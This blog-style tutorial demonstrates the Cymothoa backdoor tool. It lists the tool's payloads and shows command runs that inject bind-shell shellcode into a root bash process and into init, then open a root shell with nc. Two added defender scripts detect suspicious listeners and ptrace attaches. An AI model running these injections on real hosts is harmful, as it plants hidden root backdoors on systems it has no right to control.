co4ie

Cymothoa Backdoor Inject


Inject Backdoor’s Shellcode Into An Existing Process

Cymothoa is a stealth backdooring tool that injects a backdoor's shellcode into an existing process. The tool uses the ptrace library (available on nearly all *nix systems) to manipulate processes and infect them.

root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -S

0 - bind /bin/sh to the provided port (requires -y)
1 - bind /bin/sh + fork() to the provided port (requires -y) - izik <izik@tty64.org>
2 - bind /bin/sh to tcp port with password authentication (requires -y -o)
3 - /bin/sh connect back (requires -x, -y)
4 - tcp socket proxy (requires -x -y -r) - Russell Sanford (xort@tty64.org)
5 - script execution (requires -i -c), creates a tmp file in the process dir you must remove
6 - forks an HTTP Server on port tcp/8800 - http://xenomuta.tuxfamily.org/
7 - serial port busybox binding - phar@stonedcoder.org mdavis@ioactive.com
8 - forkbomb (just for fun...) - Kris Katterjohn
9 - open cd-rom loop (follows /dev/cdrom symlink) - izik@tty64.org
10 - audio (knock knock knock) via /dev/dsp - Cody Tubbs (pigspigs@yahoo.com)
root@Dis9Team:/pentest/backdoors/cymothoa#

Find the pid of /bin/bash:

root@Dis9Team:/pentest/backdoors/cymothoa# ps aux | grep /bin/bash
root 1236 0.0 0.2 4280 1376 tty1 S+ 09:22 0:00 /bin/bash /usr/bin/startx
root 1506 0.1 0.3 4648 1932 pts/1 S 09:22 0:00 /bin/bash
root 1554 0.0 0.1 3376 744 pts/1 S+ 09:26 0:00 grep --color=auto /bin/bash

pid = 1506

root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa  -p 1506 -s 0 -y 10086
[+] attaching to process 1506

register info:
-----------------------------------------------------------
eax value: 0xfffffe00 ebx value: 0xffffffff
esp value: 0xbf940ae4 eip value: 0xb7818422
------------------------------------------------------------

[+] new esp: 0xbf940ae0
[+] injecting code into 0xb7819000
[+] copy general purpose registers
[+] detaching from 1506

[+] infected!!!
root@Dis9Team:/pentest/backdoors/cymothoa#

-s 0 selects payload 0 – bind /bin/sh to the provided port (requires -y)

root@Dis9Team:/pentest/backdoors/cymothoa# nmap -p 10086 127.0.0.1

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-23 09:29 CST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00062s latency).
PORT STATE SERVICE
10086/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds

root@Dis9Team:/pentest/backdoors/cymothoa# nc 127.0.0.1 10086
id
uid=0(root) gid=0(root) groups=0(root)
pwd
/pentest/backdoors/cymothoa

Next, payload 2 – bind /bin/sh to tcp port with password authentication (requires -y -o)

root@Dis9Team:/pentest/backdoors/cymothoa# ./cymothoa -p 1 -s 2 -y 1002 -o 123456
[+] attaching to process 1

register info:
-----------------------------------------------------------
eax value: 0xfffffdfe ebx value: 0xa
esp value: 0xbfc0240c eip value: 0xb7856422
------------------------------------------------------------

[+] new esp: 0xbfc02408
[+] injecting code into 0xb7857000
[+] copy general purpose registers
[+] detaching from 1

[+] infected!!!
root@Dis9Team:/pentest/backdoors/cymothoa# nc 127.0.0.1 1002
Password: 123456

A very useful tool ... simple and to the point!!

Source
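Both demonstrations above end the same way: a process that never listens on the network (an interactive /bin/bash, and then init with pid 1) suddenly owns a listening TCP socket. That mismatch between a process's identity and its sockets is the cheapest host-side indicator of an injected bind shell. The script below is an added example for defenders and is not part of the original post or of the Cymothoa project: it parses /proc/net/tcp, maps each LISTEN socket back to its owning process through the socket inodes exposed in /proc/<pid>/fd, and flags listeners owned by processes on a small deny list. The sample /proc snapshot embedded in the script is constructed to mirror the post (bash pid 1506 on port 10086, init on port 1002, plus an expected sshd on port 22); the `snapshot_procs` helper reads a live /proc for real use.

```python
import os
import re
import socket
import struct
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

TCP_LISTEN = 0x0A  # socket state value used in /proc/net/tcp

# Processes that should never own a listening TCP socket on a typical host.
# Extend this list for your environment; it is an assumption, not a standard.
SUSPECT_COMMS = {"bash", "sh", "dash", "init", "cron", "getty"}

SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")


@dataclass
class Listener:
    ip: str
    port: int
    inode: int
    uid: int


def parse_proc_net_tcp(text: str) -> List[Listener]:
    """Return every LISTEN socket from the text of /proc/net/tcp."""
    listeners = []
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) < 10:
            continue
        local, state = fields[1], fields[3]
        if int(state, 16) != TCP_LISTEN:
            continue
        ip_hex, port_hex = local.split(":")
        # IPv4 addresses are stored as little-endian hex in /proc/net/tcp
        ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
        listeners.append(Listener(ip, int(port_hex, 16), int(fields[9]), int(fields[7])))
    return listeners


def socket_inodes(fd_targets: Iterable[str]) -> Set[int]:
    """Extract socket inodes from readlink() results of /proc/<pid>/fd/*."""
    return {int(m.group(1)) for t in fd_targets if (m := SOCKET_LINK.match(t))}


def find_suspect_listeners(proc_net_tcp: str, procs: Dict[int, dict]) -> List[dict]:
    """procs maps pid -> {"comm": name, "fds": [readlink targets]}.

    A listener is reported when its owner is on SUSPECT_COMMS, or when no
    process in the snapshot owns the inode (hidden or unreadable owner)."""
    inode_to_pid = {}
    for pid, info in procs.items():
        for ino in socket_inodes(info["fds"]):
            inode_to_pid[ino] = pid
    findings = []
    for lst in parse_proc_net_tcp(proc_net_tcp):
        pid = inode_to_pid.get(lst.inode)
        comm = procs[pid]["comm"] if pid is not None else None
        if pid is None or comm in SUSPECT_COMMS:
            findings.append({"pid": pid, "comm": comm, "ip": lst.ip,
                             "port": lst.port, "uid": lst.uid})
    return findings


def snapshot_procs() -> Dict[int, dict]:
    """Collect comm and fd link targets for every pid in /proc (run as root to see all)."""
    procs = {}
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            fds = []
            for fd in os.listdir(f"/proc/{pid}/fd"):
                try:
                    fds.append(os.readlink(f"/proc/{pid}/fd/{fd}"))
                except OSError:
                    pass
        except OSError:
            continue  # process exited or is not readable
        procs[pid] = {"comm": comm, "fds": fds}
    return procs


# Constructed sample data modelled on the post: sshd on 22 (expected),
# bash pid 1506 on 10086 and init pid 1 on 1002 (both injected bind shells).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9001 1 00000000 100 0 0 10 0
   1: 00000000:2766 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9002 1 00000000 100 0 0 10 0
   2: 0100007F:03EA 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 9003 1 00000000 100 0 0 10 0
   3: 0100007F:8E8A 0100007F:0016 01 00000000:00000000 00:00000000 00000000  1000        0 9004 1 00000000 20 4 30 10 -1
"""
SAMPLE_PROCS = {
    1:    {"comm": "init", "fds": ["/dev/null", "socket:[9003]"]},
    900:  {"comm": "sshd", "fds": ["socket:[9001]"]},
    1506: {"comm": "bash", "fds": ["/dev/pts/1", "socket:[9002]"]},
}

if __name__ == "__main__":
    for f in find_suspect_listeners(SAMPLE_PROC_NET_TCP, SAMPLE_PROCS):
        print(f"pid={f['pid']} comm={f['comm']} listening on {f['ip']}:{f['port']} uid={f['uid']}")
```

For a live check, replace the sample arguments with `open("/proc/net/tcp").read()` and `snapshot_procs()`; the same inode-correlation works for /proc/net/tcp6 if you widen the address parser. The deny-list approach is deliberately narrow: a better baseline is an allow list of the services expected to listen on each host, so anything else, not only shells, is reported.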
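The "[+] attaching to process" step in both runs is a ptrace(PTRACE_ATTACH) call against a process the attacker did not start, which is exactly what a Linux audit rule such as `auditctl -a always,exit -F arch=b32 -S ptrace -k process_injection` (add a matching `-F arch=b64` rule on 64-bit hosts) records. The script below is an added example for defenders, not code from the post or from Cymothoa: it parses auditd SYSCALL records, keeps only ptrace calls whose request code (`a0`) is PTRACE_ATTACH or PTRACE_SEIZE, resolves the target pid from `a1`, and skips an optional allow list of legitimate debuggers. The audit lines embedded in it are constructed to mirror the post (a tracer attaching to pid 1506 and then to pid 1 under a 32-bit arch); field names follow the standard auditd SYSCALL record format.

```python
import re
from typing import Dict, Iterable, List

# audit arch values (AUDIT_ARCH_I386, AUDIT_ARCH_X86_64) -> ptrace syscall number
PTRACE_SYSCALL_BY_ARCH = {"40000003": 26, "c000003e": 101}

# ptrace request codes that begin tracing another process
ATTACH_REQUESTS = {0x10: "PTRACE_ATTACH", 0x4206: "PTRACE_SEIZE"}

FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_audit_record(line: str) -> Dict[str, str]:
    """Split one audit record into a key/value dict, stripping quotes."""
    return {k: v.strip('"') for k, v in FIELD.findall(line)}


def find_ptrace_attaches(lines: Iterable[str], allowed_exes=()) -> List[Dict[str, object]]:
    """Report every ptrace attach/seize recorded by auditd, minus allowed tracers."""
    findings = []
    for line in lines:
        rec = parse_audit_record(line)
        if rec.get("type") != "SYSCALL":
            continue
        expected = PTRACE_SYSCALL_BY_ARCH.get(rec.get("arch", "").lower())
        if expected is None or int(rec.get("syscall", "-1")) != expected:
            continue
        request = int(rec.get("a0", "0"), 16)  # syscall args are logged as hex
        if request not in ATTACH_REQUESTS:
            continue
        exe = rec.get("exe", "")
        if exe in allowed_exes:
            continue
        findings.append({
            "request": ATTACH_REQUESTS[request],
            "tracer_pid": int(rec["pid"]),
            "tracer_exe": exe,
            "target_pid": int(rec["a1"], 16),
            "uid": int(rec["uid"]),
            "success": rec.get("success") == "yes",
        })
    return findings


# Constructed sample records (not real audit output from the post's host).
# a1=5e2 is pid 1506 in hex; a0=10 is PTRACE_ATTACH; a0=2 is PTRACE_PEEKDATA.
SAMPLE_AUDIT_LOG = [
    'type=SYSCALL msg=audit(1324603759.101:201): arch=40000003 syscall=26 success=yes exit=0 '
    'a0=10 a1=5e2 a2=0 a3=0 items=0 ppid=1234 pid=1560 auid=0 uid=0 gid=0 euid=0 suid=0 '
    'fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts1 ses=1 comm="cymothoa" '
    'exe="/pentest/backdoors/cymothoa/cymothoa" key="process_injection"',
    'type=PROCTITLE msg=audit(1324603759.101:201): proctitle="./cymothoa -p 1506 -s 0 -y 10086"',
    'type=SYSCALL msg=audit(1324603759.102:202): arch=40000003 syscall=26 success=yes exit=0 '
    'a0=2 a1=5e2 a2=b7818422 a3=0 items=0 ppid=1234 pid=1560 auid=0 uid=0 gid=0 euid=0 suid=0 '
    'fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts1 ses=1 comm="cymothoa" '
    'exe="/pentest/backdoors/cymothoa/cymothoa" key="process_injection"',
    'type=SYSCALL msg=audit(1324603802.550:260): arch=40000003 syscall=26 success=yes exit=0 '
    'a0=10 a1=1 a2=0 a3=0 items=0 ppid=1234 pid=1561 auid=0 uid=0 gid=0 euid=0 suid=0 '
    'fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts1 ses=1 comm="cymothoa" '
    'exe="/pentest/backdoors/cymothoa/cymothoa" key="process_injection"',
    'type=SYSCALL msg=audit(1324604000.000:300): arch=40000003 syscall=26 success=yes exit=0 '
    'a0=10 a1=abc a2=0 a3=0 items=0 ppid=2000 pid=2001 auid=1000 uid=1000 gid=1000 euid=1000 '
    'suid=1000 fsuid=1000 egid=1000 sgid=1000 fsgid=1000 tty=pts2 ses=2 comm="gdb" '
    'exe="/usr/bin/gdb" key="process_injection"',
]

if __name__ == "__main__":
    for f in find_ptrace_attaches(SAMPLE_AUDIT_LOG, allowed_exes={"/usr/bin/gdb"}):
        print(f"{f['request']}: pid {f['tracer_pid']} ({f['tracer_exe']}) -> pid {f['target_pid']} "
              f"uid={f['uid']} success={f['success']}")
```

Attach to pid 1 (or to any long-lived daemon) by a tracer that is not a known debugger deserves an alert on its own; correlating the target pid with a new listening socket on the same host, as in the /proc example, turns two weak signals into a strong one. On 64-bit kernels the 32-bit compat path still logs arch=40000003, so keep both arch entries even on x86_64 hosts.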
